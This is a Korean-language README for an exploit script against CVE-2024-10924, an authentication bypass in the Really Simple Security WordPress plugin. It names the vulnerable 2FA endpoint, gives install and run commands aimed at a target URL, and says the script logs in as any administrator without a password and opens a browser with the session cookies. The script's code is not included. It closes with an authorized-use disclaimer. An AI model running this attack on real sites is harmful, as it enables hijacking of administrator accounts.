
Really Simple Security (Free, Pro, and Pro Multisite) 9.0.0 - 9.1.1.1 - 인증 우회
Really Simple Security (Free, Pro, and Pro Multisite) 9.0.0 - 9.1.1.1 - 인증 우회
이 스크립트는 WordPress용 Really Simple Security 플러그인(버전 9.0.0 - 9.1.1.1)의 취약점을 악용합니다. 이 결함은 Two-Factor Authentication API의 check_login_and_get_user 함수에서 부적절한 오류 처리로 인해 인증 우회를 허용합니다.
이 익스플로잇을 사용하면 공격자는 2FA가 활성화된 경우 모든 사용자(예: 관리자)로 로그인할 수 있습니다. 인증이 완료되면 스크립트는 획득한 세션 쿠키로 브라우저 세션을 자동으로 실행합니다.
스크립트를 실행하기 전에 필요한 종속성을 설치하세요:
pip install requests selenium webdriver-manager
python CVE-2024-10924.py -u http://TARGET-WEBSITE.com/
/wp-json/reallysimplessl/v1/two_fa/skip_onboarding
/wp-admin/으로 리디렉션하여 비밀번호 없이 관리자 액세스 권한을 부여합니다.usage: CVE-2024-10924.py [-h] -u URL
WordPress Login Exploit | Really Simple Security (Free, Pro, and Pro Multisite) 9.0.0 - 9.1.1.1 - Authentication
Bypass
options:
-h, --help show this help message and exit
-u URL, --url URL Target WordPress URL
이 스크립트는 교육 목적과 공인된 보안 평가에만 사용하도록 제작되었습니다. 이 스크립트의 오용은 법적 결과를 초래할 수 있습니다. 모든 시스템에서 테스트하기 전에 항상 적절한 승인을 받으십시오.